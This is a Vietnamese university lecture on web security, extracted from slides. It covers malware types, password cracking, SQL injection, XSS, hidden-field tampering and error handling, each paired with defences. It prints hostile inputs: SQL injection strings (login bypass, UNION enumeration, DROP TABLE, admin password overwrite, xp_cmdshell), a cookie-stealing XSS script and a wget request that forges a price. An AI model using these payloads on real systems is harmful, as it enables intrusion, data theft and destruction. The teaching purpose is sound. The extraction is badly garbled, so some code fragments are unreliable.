Thitk & Lp trình Web 2
Bài 11
Web SecurityWeb Security
Ths. TrnTh Bích Hnh
Khoa CNTT Khoa CNTT –– H.KHTNH.KHTN
© 2009 Khoa Công ngh thông tin
Thitk & Lp trình Web 2 – Bài 11: Web Security
NiNi
dungdung
NiNi
dungdung
 Mts khái nimv Bomt
 Mts l hng bomt Web & cách phòng tránh
 Các Công c h tr kimtrabomtWeb
© 2009 Khoa CNTT - HKHTN
2
Thitk & Lp trình Web 2 – Bài 11: Web Security
NiNi
dungdung
NiNi
dungdung
 Mts khái nimv Bomt
 Mts l hng bomt Web & cách phòng tránh
 Các Công c h tr kimtrabomtWeb
© 2009 Khoa CNTT - HKHTN
3
Thitk & Lp trình Web 2 – Bài 11: Web Security
Threats & VulnerabilityThreats & Vulnerability
Threats

&

VulnerabilityThreats

&

Vulnerability
 Threats


–
Hành đng hocs kin gây hi đ

nh th

ng
 Vulnerability
– L hng hoc đimyucah thng mà tđó cho phép
i
khá
â
h
à
h
th
ng
i
khá
cx
â
mn

h
pv
à
o
h
th
ng
© 2009 Khoa CNTT - HKHTN
4
Thitk & Lp trình Web 2 – Bài 11: Web Security
Malicious SoftwareMalicious Software
Malicious

SoftwareMalicious

Software
 Virus

–
Các chng trình có kh nng t nhân bn và lây nhi

mvào
các tp tin trên máy tính
–
Khi
ngi
dùng
thc
thi
mt

tp
tin
b
nhim
virus
s
kích
–
Khi
ngi
dùng
thc
thi
mt
tp
tin

b
nhim
virus

s
kích
hot virus hot đng
 Tro
j
an
j
– Chng trình thu thp thông tin d liut máy tính
 W

o
rm
o
– Các chng trình có kh nng nhân bnt máy tính này
sang máy tính khác nhmmctiêuchimthigianx lý CPU
à
thi
i
đ
ó
hú
© 2009 Khoa CNTT - HKHTN
v
à
thi
g
i
an
đ
x
ó
ac
hú
ng
5
Thitk & Lp trình Web 2 – Bài 11: Web Security
BoBo
vv
ngng
dngdng

BoBo
vv
ngng
dngdng
 S dng Firewall
 S dng Chng trình Anti-virus
 S dng Chng trình Anti-spyware
© 2009 Khoa CNTT - HKHTN
6
Thitk & Lp trình Web 2 – Bài 11: Web Security
Password CrackingPassword Cracking
Password

CrackingPassword

Cracking
 Phng pháp lumtkhu
–
Không mã hóa
– Mã hóa 2 chiu
M
hó
1
hi
–
M
ã
hó
a
1

c
hi
u
 Password cracking
– Brute force attack
– Dictionary attack
© 2009 Khoa CNTT - HKHTN
7
Thitk & Lp trình Web 2 – Bài 11: Web Security
KhôngKhông
mãmã
hóahóa
mtmt
khukhu
KhôngKhông
mãmã
hóahóa
mtmt
khukhu
© 2009 Khoa CNTT - HKHTN
8
Thitk & Lp trình Web 2 – Bài 11: Web Security
MãMã
hóahóa
22
chiuchiu
MãMã
hóahóa
2


2

chiuchiu
© 2009 Khoa CNTT - HKHTN
9
Thitk & Lp trình Web 2 – Bài 11: Web Security
MãMã
hóahóa
11
chiuchiu
MãMã
hóahóa
1

1

chiuchiu
© 2009 Khoa CNTT - HKHTN
10
Thitk & Lp trình Web 2 – Bài 11: Web Security
Password CrackingPassword Cracking
Password

CrackingPassword

Cracking
© 2009 Khoa CNTT - HKHTN
11
Thitk & Lp trình Web 2 – Bài 11: Web Security
Password Cracking (Password Cracking (

tttt
))
Password

Cracking

(Password

Cracking

(
tttt
))
 Brute force attack


–
Mã hóa hàng ngàn passwords có s

nb

ng hàm hash
– So sánh ktqu vid liu hash trong database
 Dictionary attack
– Lu danh sách các username & password thông dng
– Dùng các thông tin này đ thđng nhph thng
© 2009 Khoa CNTT - HKHTN
12
Thitk & Lp trình Web 2 – Bài 11: Web Security
BoBo

vv
mtmt
khukhu
BoBo
vv
mtmt
khukhu
 Giihns ln đng nhpthtbi
S
d
t
kh
h
(t d)

S
d
ng m
t
kh
umn
h
(
s
t
rong passwor
d)
– Chiu dài tithiu
–
Không

s
dng
các
t
trong
t
đin
dãy
ký
t
liên
tip
Không
s
dng
các
t
trong
t
đin
,
dãy
ký
t
liên
tip
– Kthpch cái, kí t s, kí tđcbit
 Chng thcngi dùng khi đi & reset mtkhu
– Khi thay đimtkhu, nên chng thclingi dùng: mtkhuc,
tài khonngi dùng…

Khi
nhn
đc
yêu
cu
reset
mt
khu
cng
nên
xác
nhn
li
yêu
–
Khi
nhn
đc
yêu
cu
reset

mt
khu
,
cng
nên
xác
nhn
li

yêu
cu reset
 S dng các giao thc đáng tin cykhix lý mtkhu
© 2009 Khoa CNTT - HKHTN
13
Thitk & Lp trình Web 2 – Bài 11: Web Security
EE

mail Attacksmail Attacks
EE

mail

Attacksmail

Attacks
 E-mail Bombing
Gi
ù
t
il
hi
l
đ
t
–
Gi
c
ù
ng m

t
ema
il
n
hi
u
l
n
đ
nm
t
use
r
– Mctiêuchim đng truynvàx lý ca mail server
 E-mail Spamming
– Gi email đn nhiuuser
– Thng s dng mailing list
© 2009 Khoa CNTT - HKHTN
14
Thitk & Lp trình Web 2 – Bài 11: Web Security
BoBo
vv
EmailEmail
BoBo
vv
EmailEmail
 Không hinthđach email trên web
<a href=mailto:>Gui mail</a>
 S dng hình nh hockýtđtbit đ thay th
Ttbhanh at fit dot hcmuns dot edu dot vn

 Thitlp rule cho mailing list ch nhn email t mail nib
 S dng CAPCHA đ phòng nhpliutđng…
© 2009 Khoa CNTT - HKHTN
15
Thitk & Lp trình Web 2 – Bài 11: Web Security
DenialDenial

ofof

Service (Service (
DoSDoS
) Attacks) Attacks
DenialDenial

ofof

Service

(Service

(
DoSDoS
)

Attacks)

Attacks
 Gi liên tip nhiuyêucu đn server
 Mctiêu
– Chim đng truynmng

– Chnktnigia hai máy tính
– Làm cho server không có kh nng phcv client
© 2009 Khoa CNTT - HKHTN
16
Thitk & Lp trình Web 2 – Bài 11: Web Security
DoSDoS
AttacksAttacks
DoSDoS
AttacksAttacks
© 2009 Khoa CNTT - HKHTN
17
Thitk & Lp trình Web 2 – Bài 11: Web Security
NiNi
dungdung
NiNi
dungdung
 Mts khái nimv Bomt
 Mts l hng bomt Web & cách phòng tránh
 Các Công c h tr kimtrabomtWeb
© 2009 Khoa CNTT - HKHTN
18
Thitk & Lp trình Web 2 – Bài 11: Web Security
MtMt
ss
ll
hnghng
bobo
mtmt
Web &Web &
cáchcách

phòngphòng
tránhtránh
MtMt
ss
ll
hnghng
bobo
mtmt
Web

&

Web

&

cáchcách
phòngphòng
tránhtránh
 SQL Injection
 XSS (Cross-Site Scripting)
 Hidden Field Vulnerability
 Failing to Handle Error
© 2009 Khoa CNTT - HKHTN
19
Thitk & Lp trình Web 2 – Bài 11: Web Security
MtMt
ss
ll
hnghng

bobo
mtmt
Web &Web &
cáchcách
phòngphòng
tránhtránh
MtMt
ss
ll
hnghng
bobo
mtmt
Web

&

Web

&

cáchcách
phòngphòng
tránhtránh
 SQL Injection
 XSS (Cross-Site Scripting)
 Hidden Field Vulnerability
 Failing to Handle Error
© 2009 Khoa CNTT - HKHTN
20
Thitk & Lp trình Web 2 – Bài 11: Web Security

SQL InjectionSQL Injection
 Mtk thut cho phép nhng k tn công li
d
l
h
t
i
ki
t
d
li
h
SQL

Injection

SQL

Injection

d
ng
l
h
ng
t
rong v
i
c
ki

m
t
ra
d
li
un
h
p
trong các ng dng web và các thông báo lica
h
qun
tr
c
s
d
liu
đ
đa
vào
và
thi
hành
h
qun
tr
c
s
d
liu
đ

đa
vào
và
thi
hành
các câu lnh SQL bthp pháp
© 2009 Khoa CNTT - HKHTN
21
Thitk & Lp trình Web 2 – Bài 11: Web Security
CácCác
dngdng
tntn
côngcông
SQL InjectionSQL Injection
CácCác
dngdng
tntn
côngcông
SQL

InjectionSQL

Injection
 Vt qua kimtralúcđng nhp (authorization bypass)
 Lyd liu
 Thay đid liu
 Githcthichng trình khác
© 2009 Khoa CNTT - HKHTN
22
Thitk & Lp trình Web 2 – Bài 11: Web Security

VtVt
KimKim
tratra
lúclúc
đngđng
nhpnhp
VtVt
KimKim
tratra
lúclúc
đngđng
nhpnhp
 Câu SQL thng dùng trong đng nhp:
strSQL = "SELECT * FROM Users "
+ "WHERE Username='" + strUsername + "'"
+ " and Password=
'" + strPassword + "'"
© 2009 Khoa CNTT - HKHTN
23
Thitk & Lp trình Web 2 – Bài 11: Web Security
VtVt
KimKim
tratra
lúclúc
đngđng
nhpnhp
((
tttt
))
VtVt

KimKim
tratra
lúclúc
đngđng
nhpnhp
((
tttt
))
  vt qua, ngi dùng nhp:
strUsername: ' or '' = '
strPassword: ' or '' = '

Câu
SQL
lúc
này
:
Câu
SQL

lúc
này
:
SELECT * FROM Users
Where Username =
'' or '' = ''
and Password = '' or '' = ''
Câu SQL này luôn đúng, và tr v ttc thông tin trong bng Users
© 2009 Khoa CNTT - HKHTN
Câu


SQL

này

luôn

đúng,

và

tr

v

tt

c

thông

tin

trong

bng

Users
24
Thitk & Lp trình Web 2 – Bài 11: Web Security

LyLy
dd
liuliu

SS
dngdng
câucâu
SelectSelect
 Xem chi tit1 bn tin
h// h /h ?ID
123
LyLy
dd
liuliu

SS
dngdng
câucâu
Select

Select

–
h
ttp:
//
www.my
h
ost.com
/

s
h
ownews.aspx
?ID
=
123
– Code x lý
string ID = Request.QueryString[“ID"];
string strSQL =
"select * from News
where NewsID
="
+ID
;
where

NewsID

+

ID
;
 Nungi dùng thay ch 123 bng chui 0 or 1=1
 Khi đó câu lnh SQL:
– select * from News where NewsID=0 or 1=1
© 2009 Khoa CNTT - HKHTN
Kt qu là s hin tt c tin tc
25
Thitk & Lp trình Web 2 – Bài 11: Web Security
LyLy

dd
liuliu

SS
dngdng
câucâu
Select & UnionSelect & Union
LyLy
dd
liuliu

SS
dngdng
câucâu
Select

&

UnionSelect

&

Union
 Mts ví d khác
 ' UNION SELECT ALL SELECT OtherField FROM
OtherTable WHERE ' '='
nu h thng báo li v cú pháp dng: Invalid object name
“OtherTable”; ta có th bit chc là h thng đã thc hin câu SELECT
sau t khóa UNION
 ' UNION SELECT name FROM sysobjects WHERE

xtype = 'U'
Lit kê tên tt c các bng d liu
© 2009 Khoa CNTT - HKHTN
26
Thitk & Lp trình Web 2 – Bài 11: Web Security
ThayThay
điđi
dd
liuliu

SS
dngdng
câucâu
lnhlnh
InsertInsert
ThayThay
điđi
dd
liuliu

SS
dngdng
câucâu
lnhlnh
InsertInsert
 Câu lnh dùng:
string strSQL = "INSERT INTO TableName "
+ "VALUES('" +
strValue1 + "','" + strValue2 + "','“
tVl 3

"')"
+ s
t
r
V
a
l
ue
3
+
"')"
 Nungi dùng nhptrng th nht (strValue1)
' (SELECT TOP 1
Fi ldN
FROM
TblN
)'
'
+
(SELECT

TOP

1

Fi
e
ldN
ame
FROM


T
a
bl
e
N
ame
)
+
'
 Khi đócâulnh SQL:
INSERT INTO
TblN
VALUES(''+(
SELECT TOP 1
INSERT

INTO

T
a
bl
e
N
ame
VALUES('

'

+


(
SELECT

TOP

1

FieldName FROM TableName) + ' ', 'abc', 'def')
Ngoài
lnh
Insert,
thì
câu
lnh
này
còn
thc
hin
lnh
Select
© 2009 Khoa CNTT - HKHTN
Ngoài
lnh
Insert,

thì
câu
lnh
này

còn
thc
hin
lnh
Select
27
Thitk & Lp trình Web 2 – Bài 11: Web Security
ThayThay
điđi
dd
liuliu
––
SS
dngdng
câucâu
lnhlnh
Update & DropUpdate & Drop
ThayThay
điđi
dd
liuliu
––
SS
dngdng
câucâu
lnhlnh
Update

&


DropUpdate

&

Drop
 ; DROP TABLE <Tên Table>
Xóa bng d liu
 ; UPDATE USERS SET EMAIL=‘your email’ WHERE
username=‘admin’
‘O SSS SSO‘ ’
To đach email mi sau đós dng chcnng password recovery

‘
UNI
O
N UPDATE U
S
ER
S

S
ET PA
SS
W
O
RD=
‘
your pass
’


WHERE username=‘admin’
Thitl
p
m

tkhumi
© 2009 Khoa CNTT - HKHTN
28
p

Thitk & Lp trình Web 2 – Bài 11: Web Security
GiGi
thcthc
thithi
chngchng
trìnhtrình
kháckhác
SS
dngdng
storedstored
proceduresprocedures
 Thcthivi quynquntr h thng ‘sa’
GiGi
thcthc
thithi
chngchng
trìnhtrình
kháckhác

SS

dngdng
storedstored

proceduresprocedures
–
'; EXEC xp_cmdshell 'cmd.exe dir C:'
Thc hin lnh lit kê th mc trên  đa C:\ cài đt server
 Vi

c
p
há ho

ikiunàotu

thu

c vào câu l

nh đn
g
sau

p




g
cmd.exe.

© 2009 Khoa CNTT - HKHTN
29
Thitk & Lp trình Web 2 – Bài 11: Web Security
Cách phòng tránhCách phòng tránh
Cách

phòng

tránh

Cách

phòng

tránh


Kim soát chtch d liunhpvào


–
Vi

t hàm lccáckýtđcbit trong chu

inhpvào
– Vd: " ", "'", ";", " ", "xp_", "select",
"
drop
"

,
"
insert
"
,
"
delete
"
drop ,
insert ,

delete
Thit
l

hì h
tà
h
h

t 

d
li

Thit
l
pc

u

hì
n
h
an
t
o
à
nc
h
o
h
qu

n
t
r

c s

d
li
u
– Giihn quynx lí d liu đntàikhonngi dùng
Tránh
dùng
đn
các
quyn
nh
dbo

hay
sa
–
Tránh
dùng
đn
các
quyn
nh
dbo
hay

sa
.
© 2009 Khoa CNTT - HKHTN
Thitk & Lp trình Web 2 – Bài 11: Web Security
MtMt
ss
ll
hnghng
bobo
mtmt
Web &Web &
cáchcách
phòngphòng
tránhtránh
MtMt
ss
ll
hnghng

bobo
mtmt
Web

&

Web

&

cáchcách
phòngphòng
tránhtránh
 SQL Injection
 XSS (Cross-Site Scripting)
 Hidden Field Vulnerability
 Failing to Handle Error
© 2009 Khoa CNTT - HKHTN
31
Thitk & Lp trình Web 2 – Bài 11: Web Security
XSS (CrossXSS (Cross

Site Scripting)Site Scripting)
XSS

(CrossXSS

(Cross

Site


Scripting)Site

Scripting)
 Mtk thut cho phép nhng k tn công lidng l hng
trong
vic
kim
tra
d
liu
nhp
trong
các
ng
dng
trong
vic
kim
tra
d
liu
nhp
trong
các
ng
dng
web và các thông báo linhm chèn nhng đon mã
script nguy him có th gây nguy hi cho nhng
ngi s dng

© 2009 Khoa CNTT - HKHTN
32
Thitk & Lp trình Web 2 – Bài 11: Web Security
Phát
hin
l
hng
XSS
Phát
hin
l
hng
XSS
1. Vào website cnkimtra
2. nh v các form nhpliu:
search, login form,
querystring
querystring
…
3. Nhphoc chèn đon script
vào
form
nhp
liu
hoc
vào
form

nhp
liu

hoc
trên đng dnurl&
submit. Ví d
<script>alert(‘XSS’);</script>
4. Nuthycas alert xut
hin
thì
website
có
l
hng
© 2009 Khoa CNTT - HKHTN
hin
thì
website

có
l
hng
XSS
33
Ref: />Thitk & Lp trình Web 2 – Bài 11: Web Security
PhátPhát
hinhin
ll
hnghng
XSSXSS
––
VíVí
dd

PhátPhát
hinhin
ll
hnghng
XSS

XSS

––
VíVí
dd
© 2009 Khoa CNTT - HKHTN
34
Thitk & Lp trình Web 2 – Bài 11: Web Security
TnTn
côngcông
XSSXSS
TnTn
côngcông
XSSXSS
© 2009 Khoa CNTT - HKHTN
35
Thitk & Lp trình Web 2 – Bài 11: Web Security
TnTn
côngcông
XSSXSS
––
VíVí
dd
TnTn

côngcông
XSS

XSS

––
VíVí
dd
<script>
i=new Image();
i.src=" +
© 2009 Khoa CNTT - HKHTN
36
escape(document.cookie);
</script>
Thitk & Lp trình Web 2 – Bài 11: Web Security
CáchCách
phòngphòng
tránhtránh
CáchCách
phòngphòng
tránhtránh
 Kimtrad liunhpt ngi dùng

–
Ch ch

pnhnnhn
g
d


liuhpl
– Lc các ký tđcbit
–
Phát hin các th script
 Mã hoá (encoding) các kí tđcbittrc khi in ra website
nhmngnchn website t thc thi các script không mong
mun
mun
© 2009 Khoa CNTT - HKHTN
37
Thitk & Lp trình Web 2 – Bài 11: Web Security
MtMt
ss
ll
hnghng
bobo
mtmt
Web &Web &
cáchcách
phòngphòng
tránhtránh
MtMt
ss
ll
hnghng
bobo
mtmt
Web


&

Web

&

cáchcách
phòngphòng
tránhtránh
 SQL Injection
 XSS (Cross-Site Scripting)
 Hidden Field Vulnerability
 Failing to Handle Error
© 2009 Khoa CNTT - HKHTN
38
Thitk & Lp trình Web 2 – Bài 11: Web Security
Hidden Field VulnerabilityHidden Field Vulnerability
Hidden

Field

VulnerabilityHidden

Field

Vulnerability
 Là thông tin n trong trang web, đcth hindith
<input type=“hidden” value=“xyz” />
 Không hinth lên trình duyt
 Có th xem đcvichcnng View Source

© 2009 Khoa CNTT - HKHTN
39
Thitk & Lp trình Web 2 – Bài 11: Web Security
Hidden Field VulnerabilityHidden Field Vulnerability
––
VíVí
dd
Hidden

Field

Vulnerability

Hidden

Field

Vulnerability

––
VíVí
dd
<form id="frmThanhToan" name=" frmThanhToan " method=“POST" action="thanhtoan.php">
<p>S lng snphmcn mua:
<
input name="sosanpham" type="text" id="sosanpham" size="10"/>
(snphm)
</p>
<p>Mã s th tín dng
<

input name="masothe" type="text" id="masothe" size="20"/>
<
input
name
="
thanhtoan
"
type
="
submit
"
id
="
thanhtoan
"
value
="
ok
"
/
>
© 2009 Khoa CNTT - HKHTN
input
name
thanhtoan
type
submit
id
thanhtoan
value

ok
/
</p>
<
input type="hidden" name="gia" value="10000000" />
</
form>
40
Thitk & Lp trình Web 2 – Bài 11: Web Security
MôMô
hìnhhình
xx
lýlý
MôMô
hìnhhình
xx
lýlý
// thanhtoan.php
if
(
$
REQUEST
["
hh
"] " k")
if
(
$
_
REQUEST

["
t
h
an
h
toan
"]
==
"
o
k")
{
$tongtien=$_
REQUEST["gia"] * $_REQUEST["sosanpham"];
printf
("
Tng
giá
tin
:
%
d
VND"
$
tongtien
)
;
© 2009 Khoa CNTT - HKHTN
41
printf

("
Tng
giá
tin
:
%
d
VND"
,
$
tongtien
)
;
}
Thitk & Lp trình Web 2 – Bài 11: Web Security
TnTn
côngcông
TnTn
côngcông
Wget - -post-data “gia=1000&thanhtoan=ok&sosanpham=1”
h //l lh /S i / h h h
© 2009 Khoa CNTT - HKHTN
42
h
ttp:
//l
oca
lh
ost
/S

ecur
i
ty
/
t
h
an
h
toan.p
h
p
Thitk & Lp trình Web 2 – Bài 11: Web Security
CáchCách
phòngphòng
tránhtránh
CáchCách
phòngphòng
tránhtránh
 Mã hóa d liulu trong Hidden Fields
 Không lucácd liunhycm trong Hidden Fields
© 2009 Khoa CNTT - HKHTN
43
Thitk & Lp trình Web 2 – Bài 11: Web Security
MtMt
ss
ll
hnghng
bobo
mtmt
Web &Web &

cáchcách
phòngphòng
tránhtránh
MtMt
ss
ll
hnghng
bobo
mtmt
Web

&

Web

&

cáchcách
phòngphòng
tránhtránh
 SQL Injection
 XSS (Cross-Site Scripting)
 Hidden Field Vulnerability
 Failing to Handle Error
© 2009 Khoa CNTT - HKHTN
44
Thitk & Lp trình Web 2 – Bài 11: Web Security
Failing to Handle ErrorFailing to Handle Error
Failing


to

Handle

ErrorFailing

to

Handle

Error
 H thng không t x lý livàđ các thông báo lichi tit
hin
th
nhng
thông
tin
quan
trng
giúp
k
tn
công
xâm
hin
th
nhng
thông
tin


quan
trng
giúp
k
tn
công
xâm
nhph thng
© 2009 Khoa CNTT - HKHTN
45
Thitk & Lp trình Web 2 – Bài 11: Web Security
Failing to Handle ErrorFailing to Handle Error
––
VíVí
dd
Failing

to

Handle

Error

Failing

to

Handle

Error


––
VíVí
dd
© 2009 Khoa CNTT - HKHTN
46
Thitk & Lp trình Web 2 – Bài 11: Web Security
Failing to Handle ErrorFailing to Handle Error
––
VíVí
dd
Failing

to

Handle

Error

Failing

to

Handle

Error

––
VíVí
dd

© 2009 Khoa CNTT - HKHTN
47
Thitk & Lp trình Web 2 – Bài 11: Web Security
CáchCách
phòngphòng
tránhtránh
CáchCách
phòngphòng
tránhtránh
 Bt& X lý li
try {
…
} catch (Exception ex) {
…
}
T
hi
th
t
thô
bá
li
C
hì h
WbC fi

T

hi
n

th
t
rang
thô
ng
bá
o
li
–
C
u
hì
n
h
W
e
b
.
C
on
fi
g
<customErrors mode="On" defaultRedirect="ErrorPage.htm">
<error
statusCode
="
404
"
redirect
="

NotFound htm
"
/>
<error

statusCode
404

redirect NotFound
.
htm

/>
<error statusCode="500" redirect=“ServerError.htm" />
</customErrors>
© 2009 Khoa CNTT - HKHTN
 />48
Thitk & Lp trình Web 2 – Bài 11: Web Security
NiNi
dungdung
NiNi
dungdung
 Mts khái nimv Bomt
 Mts l hng bomt Web & cách phòng tránh
 Các Công c h tr kimtrabomtWeb
© 2009 Khoa CNTT - HKHTN
49
Thitk & Lp trình Web 2 – Bài 11: Web Security
CácCác
côngcông

cc
hh
trtr
kimkim
tratra
bobo
mtmt
WebWeb
CácCác
côngcông
cc
hh
trtr
kimkim
tratra
bobo
mtmt
WebWeb
 Nikto
–
Open Source (GPL) web server scanne
r
 Paros Proxy
– Cho phép xem/sa HTTP/HTTPS messages on-
the-fly đ thay đi cookies, form fields,…
Ati
WVS

A
cune

ti
x
WVS
– Commercial Web Vulnerability Scanner
 …
© 2009 Khoa CNTT - HKHTN
 Ref: />50
Thitk & Lp trình Web 2 – Bài 11: Web Security
Công c h tr kimtrabomtCông c h tr kimtrabomt
Công

c

h

tr

kim

tra

bo

mtCông

c

h

tr


kim

tra

bo

mt
Web Vulnerabilit
y
Scanne
r

y
- Quét l

i
- Quét cng
- Scan cutrúcWebsite
- Kimtramc đ bomtwebsite
© 2009 Khoa CNTT - HKHTN
- Download: www.acunetix.com
51
Thitk & Lp trình Web 2 – Bài 11: Web Security
© 2009 Khoa CNTT - HKHTN
Thitk & Lp trình Web 2 – Bài 11: Web Security
© 2009 Khoa CNTT - HKHTN
Thitk & Lp trình Web 2 – Bài 11: Web Security
TngTng
ktkt

TngTng
ktkt
 Threats
–
Virus, Worm & Trojan
– Brute force attack & Dictionary attack
E
ilBbi&EilS i
–
E
-ma
il

B
om
bi
ng
&

E
ma
il

S
pamm
i
ng
– Denial-of-Service (DoS) Attacks
 Web Vulnerabilities
– SQL Injection

C Si S i i (XSS)
–
C
ross
Si
te
S
cr
i
pt
i
ng
(XSS)
– Hidden Fields Vulnerability
F ili t h dl
© 2009 Khoa CNTT - HKHTN
–
F
a
ili
ng
t
o
h
an
dl
e errors
54